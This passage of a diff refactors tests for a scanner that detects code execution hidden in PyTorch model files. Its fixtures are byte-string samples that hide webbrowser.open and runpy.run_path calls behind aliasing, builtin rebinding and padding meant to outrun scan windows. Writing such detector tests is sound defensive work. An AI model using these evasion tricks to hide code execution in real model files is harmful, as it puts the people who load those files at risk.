test_prefix_typed_aliases_discover_module_import_in_tail(self) -> None: - padding = b"# pad\n" * (jit_script_module._MAX_EMBEDDED_PYTHON_IMPORT_CONTEXT_BYTES // len(b"# pad\n") + 1) - prefix = padding + b"import webbrowser as wb\nalias = wb.open\n" - - typed_aliases = jit_script_module._typed_import_aliases(prefix) - aliases = jit_script_module._unsafe_typed_member_aliases(prefix, typed_aliases) - - assert typed_aliases["wb"] == "webbrowser" - assert aliases["alias"] == frozenset({("webbrowser", "open", False)}) + _assert_late_prefix_typed_alias(b"import webbrowser as wb\nalias = wb.open\n") def test_prefix_typed_aliases_ignore_scoped_import_in_tail(self) -> None: padding = b"# pad\n" * (jit_script_module._MAX_EMBEDDED_PYTHON_IMPORT_CONTEXT_BYTES // len(b"# pad\n") + 1) @@ -9856,20 +9464,6 @@ def test_prefix_typed_member_aliases_replay_executing_class_body(self) -> None: assert aliases["alias"] == frozenset({("webbrowser", "open", False)}) - def test_scan_model_clears_callable_alias_overwritten_in_all_branches(self) -> None: - source = ( - b"from webbrowser import open as opener\n" - b"if condition:\n opener = print\nelse:\n opener = print\n" - b"opener('safe')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - @pytest.mark.parametrize( ("prefix", "expected"), [ @@ -9908,14 +9502,7 @@ def test_scan_model_replays_prefix_member_state_across_split( assert detected is expected def test_prefix_typed_aliases_discover_deterministic_indented_tail_import(self) -> None: - padding = b"# pad\n" * (jit_script_module._MAX_EMBEDDED_PYTHON_IMPORT_CONTEXT_BYTES // len(b"# pad\n") + 1) - prefix = padding + b"if True:\n import webbrowser as wb\nalias = wb.open\n" - - typed_aliases = jit_script_module._typed_import_aliases(prefix) - aliases = jit_script_module._unsafe_typed_member_aliases(prefix, typed_aliases) - - assert typed_aliases["wb"] == "webbrowser" - assert aliases["alias"] == frozenset({("webbrowser", "open", False)}) + _assert_late_prefix_typed_alias(b"if True:\n import webbrowser as wb\nalias = wb.open\n") @pytest.mark.parametrize( ("initial_state", "class_body", "expected"), @@ -9999,14 +9586,7 @@ def test_prefix_typed_aliases_ignore_unexecuted_indented_tail_import(self) -> No assert "alias" not in aliases def test_prefix_typed_aliases_keep_deterministic_tail_import_before_malformed_line(self) -> None: - padding = b"# pad\n" * (jit_script_module._MAX_EMBEDDED_PYTHON_IMPORT_CONTEXT_BYTES // len(b"# pad\n") + 1) - prefix = padding + b"if True:\n import webbrowser as wb\nalias = wb.open\nif True print(\n" - - typed_aliases = jit_script_module._typed_import_aliases(prefix) - aliases = jit_script_module._unsafe_typed_member_aliases(prefix, typed_aliases) - - assert typed_aliases["wb"] == "webbrowser" - assert aliases["alias"] == frozenset({("webbrowser", "open", False)}) + _assert_late_prefix_typed_alias(b"if True:\n import webbrowser as wb\nalias = wb.open\nif True print(\n") def test_prefix_typed_aliases_drop_with_item_rebind_before_capture(self) -> None: padding = b"# pad\n" * (jit_script_module._MAX_EMBEDDED_PYTHON_IMPORT_CONTEXT_BYTES // len(b"# pad\n") + 1) @@ -10165,11 +9745,7 @@ def test_scan_model_tracks_mutation_through_uncertain_helper( source: bytes, expected_pattern: str, ) -> None: - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == expected_pattern for finding in findings - ) + _assert_typed_member_detected(source, expected_pattern) @pytest.mark.parametrize( ("source", "unexpected_pattern"), @@ -10233,12 +9809,7 @@ def test_scan_model_ignores_rebound_inherited_eager_builtin_alias(self) -> None: b"(bi.list((opener := original) for _ in [0]), opener('safe'))\n" + padding ) - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.bin") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) + _assert_jit_scan_without_pattern(JITScriptDetector(), source, "payload.bin", "Web browser launch detected") def test_scan_model_ignores_rebound_inherited_typed_alias(self) -> None: padding = b"# pad\n" * (jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(b"# pad\n") + 8) @@ -10249,44 +9820,7 @@ def test_scan_model_ignores_rebound_inherited_typed_alias(self) -> None: b"(bi.list((opener := original) for _ in [0]), opener('safe'))\n" + padding ) - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.bin") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - def test_scan_model_accepts_restored_original_builtin_print(self) -> None: - source = ( - b"import builtins\nimport webbrowser as wb\n" - b"original_print = builtins.print\n" - b"builtins.print = input\n" - b"builtins.print = original_print\n" - b"wb.open = builtins.print\nwb.open('safe')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - def test_scan_model_rejects_restored_mutated_builtin_print_alias(self) -> None: - source = ( - b"import builtins\nimport webbrowser as wb\n" - b"original = wb.open\nbuiltins.print = original\n" - b"mutated_print = builtins.print\n" - b"builtins.print = mutated_print\n" - b"wb.open = builtins.print\nwb.open('https://example.invalid')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) + _assert_jit_scan_without_pattern(JITScriptDetector(), source, "payload.bin", "Web browser launch detected") @pytest.mark.parametrize("target", [b"(captured,)", b"[captured]"]) def test_scan_model_rejects_destructured_rebind_of_safe_print_alias(self, target: bytes) -> None: @@ -10296,12 +9830,7 @@ def test_scan_model_rejects_destructured_rebind_of_safe_print_alias(self, target b"wb.open = captured\nwb.open('https://example.invalid')\n" ) - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) + _assert_jit_scan_pattern(JITScriptDetector(), source, "payload.py", "Web browser launch detected") @pytest.mark.parametrize( "mutation", @@ -10318,12 +9847,7 @@ def test_scan_model_ignores_print_mutation_through_rebound_builtins_name(self, m b"builtins = Holder\n" + mutation + b"\nwb.open = bi.print\nwb.open('safe')\n" ) - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) + _assert_jit_scan_without_pattern(JITScriptDetector(), source, "payload.py", "Web browser launch detected") @pytest.mark.parametrize( "target", @@ -10340,27 +9864,7 @@ def test_scan_model_rejects_uncertain_mutated_builtin_print(self, target: bytes) b"wb.open = builtins.print\nwb.open('https://example.invalid')\n" ) - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - def test_scan_model_rejects_dynamic_builtin_print_mapping_mutation(self) -> None: - source = ( - b"import builtins\nimport webbrowser as wb\n" - b"original = wb.open\nmember = 'print'\n" - b"builtins.__dict__[member] = original\n" - b"wb.open = builtins.print\nwb.open('https://example.invalid')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) + _assert_jit_scan_pattern(JITScriptDetector(), source, "payload.py", "Web browser launch detected") @pytest.mark.parametrize( "mutation", @@ -10377,12 +9881,7 @@ def test_scan_model_rejects_dynamic_builtin_print_mapping_update(self, mutation: + b"\nwb.open = builtins.print\nwb.open('https://example.invalid')\n" ) - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) + _assert_jit_scan_pattern(JITScriptDetector(), source, "payload.py", "Web browser launch detected") @pytest.mark.parametrize( "rebind", @@ -10406,53 +9905,6 @@ def test_scan_model_rejects_uncertain_rebound_builtins_alias(self, rebind: bytes for finding in findings ) - def test_scan_model_accepts_uncertain_builtin_to_builtin_alias_rebinding(self) -> None: - source = ( - b"import builtins\nimport builtins as bi\nimport webbrowser as wb\n" - b"if condition:\n bi = builtins\n" - b"wb.open = bi.print\nwb.open('safe')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - def test_scan_model_keeps_maybe_dangerous_imported_callable_rebinding(self) -> None: - source = ( - b"import webbrowser as wb\n" - b"original = wb.open\n" - b"wb.open = print\n" - b"from webbrowser import open as opener\n" - b"if condition:\n opener = original\n" - b"opener('https://example.invalid')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - def test_scan_model_keeps_dangerous_callable_across_uncertain_reimport(self) -> None: - source = ( - b"from webbrowser import open as opener\n" - b"import webbrowser as wb\n" - b"wb.open = print\n" - b"if condition:\n from webbrowser import open as opener\n" - b"opener('https://example.invalid')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - @pytest.mark.parametrize( "restore", [ @@ -10492,34 +9944,6 @@ def test_scan_model_preserves_safe_member_after_uncertain_safe_write(self, safe_ for finding in findings ) - def test_scan_model_rejects_uncertain_member_write_after_branch_print_shadow(self) -> None: - source = ( - b"import webbrowser as wb\nwb.open = print\n" - b"if condition:\n print = input\n wb.open = print\n" - b"wb.open('https://example.invalid')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - def test_scan_model_accepts_branch_local_builtin_print_restoration(self) -> None: - source = ( - b"import builtins\nimport webbrowser as wb\n" - b"if condition:\n print = input\n print = builtins.print\n" - b"wb.open = print\nwb.open('safe')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - @pytest.mark.parametrize( "targets", [ @@ -10563,21 +9987,6 @@ def test_scan_model_accepts_branch_local_typed_member_restoration(self, target: for finding in findings ) - def test_scan_model_accepts_safe_print_alias_assigned_on_every_branch(self) -> None: - source = ( - b"import builtins\nimport webbrowser as wb\n" - b"if condition:\n captured = builtins.print\n" - b"else:\n captured = builtins.print\n" - b"wb.open = captured\nwb.open('safe')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - def test_scan_model_keeps_all_uncertain_imported_callable_identities(self) -> None: source = ( b"from webbrowser import open as opener\n" @@ -10594,47 +10003,17 @@ def test_scan_model_keeps_all_uncertain_imported_callable_identities(self) -> No assert "Web browser launch detected" in patterns assert "Native library loading detected" in patterns - def test_scan_model_tracks_dict_setdefault_alias_for_typed_member_restore(self) -> None: - source = ( - b"import webbrowser as wb\n" - b"put = dict.setdefault\n" - b"del wb.open\n" - b"put(wb.__dict__, 'open', print)\n" - b"wb.open('safe')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - @pytest.mark.parametrize( "restore", [ b"class C:\n wb.open = original\n wb.open('https://example.invalid')\n wb = object()\n", b"wb.__setattr__('open', original)\nwb.open('https://example.invalid')\n", b"object.__setattr__(wb, 'open', original)\nwb.open('https://example.invalid')\n", - b"del wb.open\nwb.__dict__.setdefault('open', original)\nwb.open('https://example.invalid')\n", - ], - ) - def test_scan_model_keeps_typed_calls_after_order_sensitive_restores(self, restore: bytes) -> None: - source = b"import webbrowser as wb\noriginal = wb.open\nwb.open = print\n" + restore - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - def test_scan_model_treats_comprehension_typed_write_as_conditional(self) -> None: - source = ( - b"import webbrowser as wb\n" - b"[wb.__dict__.update(open=print) for _ in values]\n" - b"wb.open('https://example.invalid')\n" - ) + b"del wb.open\nwb.__dict__.setdefault('open', original)\nwb.open('https://example.invalid')\n", + ], + ) + def test_scan_model_keeps_typed_calls_after_order_sensitive_restores(self, restore: bytes) -> None: + source = b"import webbrowser as wb\noriginal = wb.open\nwb.open = print\n" + restore findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") @@ -10666,16 +10045,6 @@ def test_scan_model_replays_only_definitely_executed_comprehension_typed_write( ) assert detected is should_detect - def test_scan_model_replays_definitely_executed_comprehension_runpy_write(self) -> None: - source = b"import runpy as rp\n[rp.__dict__.update(run_path=print) for _ in [0]]\nrp.run_path('payload.py')\n" - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) - @pytest.mark.parametrize(("restored_attribute", "should_detect"), [(b"print", False), (b"input", True)]) def test_scan_model_tracks_direct_builtin_print_restoration( self, @@ -10714,12 +10083,7 @@ def test_scan_model_invalidates_typed_cache_after_sys_modules_replacement(self, + b"import webbrowser as fresh\nfresh.open('https://example.invalid')\n" ) - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) + _assert_jit_scan_pattern(JITScriptDetector(), source, "payload.py", "Web browser launch detected") @pytest.mark.parametrize( "replacement", @@ -10740,12 +10104,7 @@ def test_scan_model_invalidates_runpy_cache_after_sys_modules_replacement(self, + b"import runpy as fresh\nfresh.run_path('payload.py')\n" ) - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) + _assert_jit_scan_pattern(JITScriptDetector(), source, "payload.py", "Dynamic module execution detected") @pytest.mark.parametrize( "mutation", @@ -10763,12 +10122,7 @@ def test_scan_model_preserves_runpy_cache_across_unrelated_sys_modules_write(sel + b"import runpy as fresh\nfresh.run_path('safe')\n" ) - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) + _assert_jit_scan_without_pattern(JITScriptDetector(), source, "payload.py", "Dynamic module execution detected") @pytest.mark.parametrize( ("middle", "should_detect"), @@ -10785,20 +10139,14 @@ def test_scan_model_invalidates_typed_delete_proof_after_mapping_update( middle: bytes, should_detect: bool, ) -> None: - source = ( - b"import webbrowser as wb\noriginal = wb.open\ndel wb.open\n" - + middle - + b"wb.__dict__.setdefault('open', print)\nwb.open('https://example.invalid')\n" + _assert_jit_mapping_update_detection( + middle, + should_detect, + (b"import webbrowser as wb\noriginal = wb.open\ndel wb.open\n"), + (b"wb.__dict__.setdefault('open', print)\nwb.open('https://example.invalid')\n"), + ("Web browser launch detected"), ) - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - detected = any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - assert detected is should_detect - @pytest.mark.parametrize( ("middle", "should_detect"), [ @@ -10814,19 +10162,13 @@ def test_scan_model_invalidates_runpy_delete_proof_after_mapping_update( middle: bytes, should_detect: bool, ) -> None: - source = ( - b"import runpy as rp\noriginal = rp.run_path\ndel rp.run_path\n" - + middle - + b"rp.__dict__.setdefault('run_path', print)\nrp.run_path('payload.py')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - detected = any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings + _assert_jit_mapping_update_detection( + middle, + should_detect, + (b"import runpy as rp\noriginal = rp.run_path\ndel rp.run_path\n"), + (b"rp.__dict__.setdefault('run_path', print)\nrp.run_path('payload.py')\n"), + ("Dynamic module execution detected"), ) - assert detected is should_detect @pytest.mark.parametrize( ("expression", "should_detect"), @@ -10899,20 +10241,6 @@ def test_scan_model_tracks_typed_delattr_before_setdefault_restore(self, deletio for finding in findings ) - def test_scan_model_ignores_shadowed_typed_delattr_before_setdefault(self) -> None: - source = ( - b"import webbrowser as wb\noriginal = wb.open\nwb.open = print\n" - b"delattr = lambda *args: None\ndelattr(wb, 'open')\n" - b"wb.__dict__.setdefault('open', original)\nwb.open('safe')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - @pytest.mark.parametrize( ("prefix", "member", "expected_pattern"), [ @@ -10945,32 +10273,6 @@ def test_scan_model_tracks_mapping_clear_before_setdefault_restore( finding.type == "code_execution_pattern" and finding.pattern == expected_pattern for finding in findings ) - def test_scan_model_tracks_getattr_typed_mapping_restore(self) -> None: - source = ( - b"import webbrowser as wb\noriginal = wb.open\nwb.open = print\n" - b"getattr(wb, '__dict__')['open'] = original\nwb.open('https://example.invalid')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - - def test_scan_model_ignores_shadowed_getattr_typed_mapping_restore(self) -> None: - source = ( - b"import webbrowser as wb\noriginal = wb.open\nwb.open = print\n" - b"getattr = lambda *_args: {}\ngetattr(wb, '__dict__')['open'] = original\nwb.open('safe')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Web browser launch detected" - for finding in findings - ) - @pytest.mark.parametrize( "middle", [ @@ -11023,21 +10325,6 @@ def test_scan_model_requires_unconditional_delete_before_safe_setdefault( ) assert detected is should_detect - def test_scan_model_ignores_conditional_safe_setdefault_after_unconditional_delete(self) -> None: - source = ( - b"import runpy as rp\nflag = False\n" - b"rp.__dict__.pop('run_path', None)\n" - b"flag and rp.__dict__.setdefault('run_path', print)\n" - b"rp.run_path('payload.py')\n" - ) - - findings = JITScriptDetector().scan_model(source, "pytorch", "payload.py") - - assert not any( - finding.type == "code_execution_pattern" and finding.pattern == "Dynamic module execution detected" - for finding in findings - ) - @pytest.mark.parametrize( "source", [ @@ -11377,11 +10664,7 @@ def test_scan_model_keeps_safe_runpy_overwrite_when_module_print_mutation_is_ina ], ) def test_scan_model_avoids_stale_indirect_builtin_aliases(self, data: bytes) -> None: - detector = JITScriptDetector() - - findings = detector.scan_model(data, "pytorch", "payload.bin") - - assert not any(finding.type == "dangerous_builtin" for finding in findings) + _assert_no_dangerous_builtin(data) @pytest.mark.parametrize( "data", @@ -11391,11 +10674,7 @@ def test_scan_model_avoids_stale_indirect_builtin_aliases(self, data: bytes) -> ], ) def test_scan_model_detects_dangerous_builtins_in_default_containers(self, data: bytes) -> None: - detector = JITScriptDetector() - - findings = detector.scan_model(data, "pytorch", "payload.bin") - - assert any(finding.type == "dangerous_builtin" and finding.builtin == "eval" for finding in findings) + _assert_eval_builtin_detected(data) @pytest.mark.parametrize( "body", @@ -11435,11 +10714,7 @@ def test_scan_model_detects_dangerous_builtins_used_as_callbacks(self, body: str ], ) def test_scan_model_avoids_noninvoking_or_shadowed_callback_lookalikes(self, data: bytes) -> None: - detector = JITScriptDetector() - - findings = detector.scan_model(data, "pytorch", "payload.bin") - - assert not any(finding.type == "dangerous_builtin" for finding in findings) + _assert_no_dangerous_builtin(data) @pytest.mark.parametrize( "body", @@ -11451,12 +10726,7 @@ def test_scan_model_avoids_noninvoking_or_shadowed_callback_lookalikes(self, dat ], ) def test_scan_model_resolves_dangerous_builtins_from_tracked_sequence_state(self, body: str) -> None: - detector = JITScriptDetector() - data = f"\x00\xffdef payload(value):\n {body}\n".encode() - - findings = detector.scan_model(data, "pytorch", "payload.bin") - - assert any(finding.type == "dangerous_builtin" and finding.builtin == "eval" for finding in findings) + _assert_eval_body_detected(body) @pytest.mark.parametrize( "body", @@ -11468,12 +10738,7 @@ def test_scan_model_resolves_dangerous_builtins_from_tracked_sequence_state(self ], ) def test_scan_model_avoids_stale_tracked_sequence_state(self, body: str) -> None: - detector = JITScriptDetector() - data = f"\x00\xffdef benign(value):\n {body}\n".encode() - - findings = detector.scan_model(data, "pytorch", "payload.bin") - - assert not any(finding.type == "dangerous_builtin" for finding in findings) + _assert_benign_body_no_builtin(body) @pytest.mark.parametrize( "body", @@ -11487,12 +10752,7 @@ def test_scan_model_avoids_stale_tracked_sequence_state(self, body: str) -> None ], ) def test_scan_model_resolves_constant_string_aliases_for_builtin_lookup(self, body: str) -> None: - detector = JITScriptDetector() - data = f"\x00\xffdef payload(value):\n {body}\n".encode() - - findings = detector.scan_model(data, "pytorch", "payload.bin") - - assert any(finding.type == "dangerous_builtin" and finding.builtin == "eval" for finding in findings) + _assert_eval_body_detected(body) @pytest.mark.parametrize( "body", @@ -11513,12 +10773,7 @@ def test_scan_model_resolves_constant_string_aliases_for_builtin_lookup(self, bo ], ) def test_scan_model_avoids_stale_constant_string_aliases(self, body: str) -> None: - detector = JITScriptDetector() - data = f"\x00\xffdef benign(value):\n {body}\n".encode() - - findings = detector.scan_model(data, "pytorch", "payload.bin") - - assert not any(finding.type == "dangerous_builtin" for finding in findings) + _assert_benign_body_no_builtin(body) @pytest.mark.parametrize( "data", @@ -11541,11 +10796,7 @@ def test_scan_model_avoids_stale_constant_string_aliases(self, body: str) -> Non ], ) def test_scan_model_detects_dangerous_instance_aliases_across_methods(self, data: bytes) -> None: - detector = JITScriptDetector() - - findings = detector.scan_model(data, "pytorch", "payload.bin") - - assert any(finding.type == "dangerous_builtin" and finding.builtin == "eval" for finding in findings) + _assert_eval_builtin_detected(data) @pytest.mark.parametrize( "data", @@ -11578,11 +10829,7 @@ def test_scan_model_detects_dangerous_instance_aliases_across_methods(self, data ], ) def test_scan_model_avoids_stale_instance_aliases_across_methods(self, data: bytes) -> None: - detector = JITScriptDetector() - - findings = detector.scan_model(data, "pytorch", "payload.bin") - - assert not any(finding.type == "dangerous_builtin" for finding in findings) + _assert_no_dangerous_builtin(data) def test_scan_model_preserves_builtin_alias_across_dead_rebind_branch(self) -> None: detector = JITScriptDetector() @@ -11678,11 +10925,7 @@ def test_scan_model_preserves_builtin_alias_across_dead_rebind_branch(self) -> N ], ) def test_scan_model_preserves_builtin_alias_across_dead_control_flow(self, data: bytes) -> None: - detector = JITScriptDetector() - - findings = detector.scan_model(data, "pytorch", "payload.bin") - - assert any(finding.type == "dangerous_builtin" and finding.builtin == "eval" for finding in findings) + _assert_eval_builtin_detected(data) @pytest.mark.parametrize( "data", @@ -11876,12 +11119,7 @@ def test_scan_model_preserves_builtin_alias_across_dead_control_flow(self, data: ], ) def test_scan_model_does_not_retain_shadowed_builtin_aliases(self, data: bytes) -> None: - detector = JITScriptDetector() - - findings = detector.scan_model(data, "pytorch", "payload.bin") - - assert not any(finding.type == "dangerous_builtin" for finding in findings) - assert not any(finding.severity == "CRITICAL" for finding in findings) + _assert_no_critical_builtin_findings(data) @pytest.mark.parametrize( "data", @@ -11951,19 +11189,8 @@ def test_scan_model_detects_middle_tail_alias_with_prefix_context(self) -> None: ) def test_scan_model_detects_tail_alias_from_compound_prefix_import(self) -> None: - detector = JITScriptDetector() - filler_line = b"# filler\n" - filler = filler_line * (2 * jit_script_module._EMBEDDED_PYTHON_SCAN_WINDOW_BYTES // len(filler_line) + 1) - source = ( - b"\x00\xffif True: import runpy as rp\n" - + filler - + b"def payload():\n return rp.run_path('payload.py')\n" - ) - - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings + _assert_runpy_across_gap( + (b"\x00\xffif True: import runpy as rp\n"), (b"def payload():\n return rp.run_path('payload.py')\n") ) def test_scan_model_preserves_full_prefixed_tail_context(self) -> None: @@ -11999,70 +11226,27 @@ def test_scan_model_ignores_escaped_triple_quote_prefix_import_context(self) -> b'"""\n' + filler + b"def payload():\n return rp.run_path('payload.py')\n" ) - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert not any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) + _assert_jit_scan_without_pattern(detector, source, "payload.bin", "Dynamic module execution detected") def test_scan_model_detects_tail_runpy_alias_from_framed_prefix_assignment_context(self) -> None: - detector = JITScriptDetector() - filler_line = b"# filler\n" - filler = filler_line * (2 * jit_script_module._EMBEDDED_PYTHON_SCAN_WINDOW_BYTES // len(filler_line) + 1) - source = ( - b"\x00\xffimport runpy\nrun = runpy.run_path\n" + filler + b"def payload():\n return run('payload.py')\n" - ) - - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings + _assert_runpy_across_gap( + (b"\x00\xffimport runpy\nrun = runpy.run_path\n"), (b"def payload():\n return run('payload.py')\n") ) def test_scan_model_detects_framed_tail_alias_with_prefix_context(self) -> None: - detector = JITScriptDetector() - filler_line = b"# filler\n" - filler = filler_line * (2 * jit_script_module._EMBEDDED_PYTHON_SCAN_WINDOW_BYTES // len(filler_line) + 1) - source = ( - b"\x00\xffimport runpy as rp\n" + filler + b"\x00\xffdef payload():\n return rp.run_path('payload.py')\n" - ) - - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings + _assert_runpy_across_gap( + (b"\x00\xffimport runpy as rp\n"), (b"\x00\xffdef payload():\n return rp.run_path('payload.py')\n") ) def test_scan_model_detects_parenthesized_tail_alias_with_prefix_context(self) -> None: - detector = JITScriptDetector() - filler_line = b"# filler\n" - filler = filler_line * (2 * jit_script_module._EMBEDDED_PYTHON_SCAN_WINDOW_BYTES // len(filler_line) + 1) - source = ( - b"\x00\xffimport runpy as rp\n" - + filler - + b"\x00\xffdef payload():\n return ((rp).run_path)('payload.py')\n" - ) - - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings + _assert_runpy_across_gap( + (b"\x00\xffimport runpy as rp\n"), (b"\x00\xffdef payload():\n return ((rp).run_path)('payload.py')\n") ) def test_scan_model_detects_multiline_parenthesized_tail_alias_with_prefix_context(self) -> None: - detector = JITScriptDetector() - filler_line = b"# filler\n" - filler = filler_line * (2 * jit_script_module._EMBEDDED_PYTHON_SCAN_WINDOW_BYTES // len(filler_line) + 1) - source = ( - b"\x00\xffimport runpy as rp\n" - + filler - + b"\x00\xffdef payload():\n return (\n rp.run_path\n )('payload.py')\n" - ) - - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings + _assert_runpy_across_gap( + (b"\x00\xffimport runpy as rp\n"), + (b"\x00\xffdef payload():\n return (\n rp.run_path\n )('payload.py')\n"), ) def test_scan_model_detects_tail_alias_after_noisy_prefix_context_budget( @@ -12076,56 +11260,10 @@ def test_scan_model_detects_tail_alias_after_noisy_prefix_context_budget( filler = filler_line * (2 * jit_script_module._EMBEDDED_PYTHON_SCAN_WINDOW_BYTES // len(filler_line) + 1) source = ( b"\x00\xff" - + noise - + b"import runpy as rp\n" - + filler - + b"def payload():\n return rp.run_path('payload.py')\n" - ) - - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) - - def test_scan_model_detects_tail_alias_call_from_prefix_annotated_assignment_context(self) -> None: - detector = JITScriptDetector() - filler_line = b"# filler\n" - filler = filler_line * (2 * jit_script_module._EMBEDDED_PYTHON_SCAN_WINDOW_BYTES // len(filler_line) + 1) - source = ( - b"\x00\xffimport runpy\nrun: object = runpy.run_path\n" - + filler - + b"def payload():\n return run('payload.py')\n" - ) - - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) - - def test_scan_model_detects_tail_module_alias_from_prefix_assignment_context(self) -> None: - detector = JITScriptDetector() - filler_line = b"# filler\n" - filler = filler_line * (2 * jit_script_module._EMBEDDED_PYTHON_SCAN_WINDOW_BYTES // len(filler_line) + 1) - source = ( - b"\x00\xffimport runpy\nrp = runpy\n" + filler + b"def payload():\n return rp.run_path('payload.py')\n" - ) - - findings = detector.scan_model(source, "pytorch", "payload.bin") - - assert any( - f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings - ) - - def test_scan_model_detects_tail_alias_call_from_prefix_unpack_assignment_context(self) -> None: - detector = JITScriptDetector() - filler_line = b"# filler\n" - filler = filler_line * (2 * jit_script_module._EMBEDDED_PYTHON_SCAN_WINDOW_BYTES // len(filler_line) + 1) - source = ( - b"\x00\xffimport runpy\n(run,) = (runpy.run_path,)\n" + + noise + + b"import runpy as rp\n" + filler - + b"def payload():\n return run('payload.py')\n" + + b"def payload():\n return rp.run_path('payload.py')\n" ) findings = detector.scan_model(source, "pytorch", "payload.bin") @@ -12134,6 +11272,22 @@ def test_scan_model_detects_tail_alias_call_from_prefix_unpack_assignment_contex f.type == "code_execution_pattern" and f.pattern == "Dynamic module execution detected" for f in findings ) + def test_scan_model_detects_tail_alias_call_from_prefix_annotated_assignment_context(self) -> None: + _assert_runpy_across_gap( + (b"\x00\xffimport runpy\nrun: object = runpy.run_path\n"), + (b"def payload():\n return 